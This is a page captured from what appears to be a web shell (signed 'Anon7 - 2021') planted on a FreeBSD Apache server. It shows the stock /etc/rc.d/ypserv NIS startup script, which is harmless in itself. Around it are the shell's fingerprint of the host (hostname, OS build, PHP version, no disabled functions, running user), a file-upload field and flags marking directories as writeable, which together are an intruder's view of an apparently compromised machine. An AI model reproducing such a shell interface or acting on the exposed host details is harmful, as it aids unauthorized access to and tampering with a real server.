KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /etc/rc.d/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //etc/rc.d/ypserv
#!/bin/sh
#
#

# PROVIDE: ypserv
# REQUIRE: rpcbind
# KEYWORD: shutdown

. /etc/rc.subr

name="ypserv"
desc="NIS database server"
rcvar="nis_server_enable"

load_rc_config $name

command="/usr/sbin/${name}"
command_args="${nis_server_flags}"

start_precmd="ypserv_prestart"

ypserv_prestart()
{
	local _domain

	force_depend rpcbind || return 1

	_domain=`domainname`
	if [ -z "$_domain" ]; then
		warn "NIS domainname(1) is not set."
		return 1
	fi
	if [ ! -d /var/yp/$_domain/. ]; then
		warn "/var/yp/$_domain is not a directory."
		return 1
	fi
}

run_rc_command "$1"

Anon7 - 2021